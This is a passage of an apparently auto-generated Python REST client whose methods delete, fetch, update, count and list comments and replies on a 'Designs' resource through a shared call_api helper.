collection_formats=collection_formats)
def designs_id_comments_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_comments_fk_delete_with_http_info(id, fk, **kwargs)
return data
def designs_id_comments_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_comments_fk_get_with_http_info(id, fk, **kwargs)
return data
def designs_id_comments_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.designs_id_comments_fk_put_with_http_info(id, fk, **kwargs)
return data
def designs_id_comments_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for comments.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str fk: Foreign key for comments (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_get(self, id, **kwargs):
"""
Queries comments of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignComment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_comments_get_with_http_info(id, **kwargs)
return data
def designs_id_comments_get_with_http_info(self, id, **kwargs):
"""
Queries comments of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str filter:
:return: list[DesignComment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DesignComment]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_commenter_get(self, id, nk, **kwargs):
"""
Fetches belongsTo relation commenter.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_commenter_get(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_commenter_get_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_commenter_get_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_commenter_get_with_http_info(self, id, nk, **kwargs):
"""
Fetches belongsTo relation commenter.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_commenter_get_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_commenter_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_commenter_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_commenter_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/commenter'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_design_get(self, id, nk, **kwargs):
"""
Fetches belongsTo relation design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_design_get(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_design_get_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_design_get_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_design_get_with_http_info(self, id, nk, **kwargs):
"""
Fetches belongsTo relation design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_design_get_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param bool refresh:
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_design_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_design_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_design_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/design'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_count_get(self, id, nk, **kwargs):
"""
Counts replies of DesignComment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_count_get(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_count_get_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_count_get_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_replies_count_get_with_http_info(self, id, nk, **kwargs):
"""
Counts replies of DesignComment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_count_get_with_http_info(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_count_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_count_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_delete(self, id, nk, fk, **kwargs):
"""
Delete a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_delete(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_fk_delete_with_http_info(id, nk, fk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_fk_delete_with_http_info(id, nk, fk, **kwargs)
return data
def designs_id_comments_nk_replies_fk_delete_with_http_info(self, id, nk, fk, **kwargs):
"""
Delete a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_delete_with_http_info(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_delete`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_get(self, id, nk, fk, **kwargs):
"""
Find a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_get(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_fk_get_with_http_info(id, nk, fk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_fk_get_with_http_info(id, nk, fk, **kwargs)
return data
def designs_id_comments_nk_replies_fk_get_with_http_info(self, id, nk, fk, **kwargs):
"""
Find a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_get_with_http_info(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_get`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_get`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_fk_put(self, id, nk, fk, **kwargs):
"""
Update a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_put(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_fk_put_with_http_info(id, nk, fk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_fk_put_with_http_info(id, nk, fk, **kwargs)
return data
def designs_id_comments_nk_replies_fk_put_with_http_info(self, id, nk, fk, **kwargs):
"""
Update a related item by id for replies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_fk_put_with_http_info(id, nk, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str fk: Foreign key for replies (required)
:param DesignComment data:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'nk', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_comments_nk_replies_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_nk_replies_fk_put`")
# verify the required parameter 'nk' is set
if ('nk' not in params) or (params['nk'] is None):
raise ValueError("Missing the required parameter `nk` when calling `designs_id_comments_nk_replies_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `designs_id_comments_nk_replies_fk_put`")
collection_formats = {}
resource_path = '/Designs/{id}/comments/{nk}/replies/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'nk' in params:
path_params['nk'] = params['nk']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_comments_nk_replies_get(self, id, nk, **kwargs):
"""
Queries replies of DesignComment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_comments_nk_replies_get(id, nk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str nk: Foreign key for comments. (required)
:param str filter:
:return: list[DesignComment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_comments_nk_replies_get_with_http_info(id, nk, **kwargs)
else:
(data) = self.designs_id_comments_nk_replies_get_with_http_info(id, nk, **kwargs)
return data
def designs_id_comments_nk_replies_get_with_http_info(self, id, nk, **kwargs):
"""
Queries replies of DesignComment.
This method makes a synchronous HTTP request by default. To make an
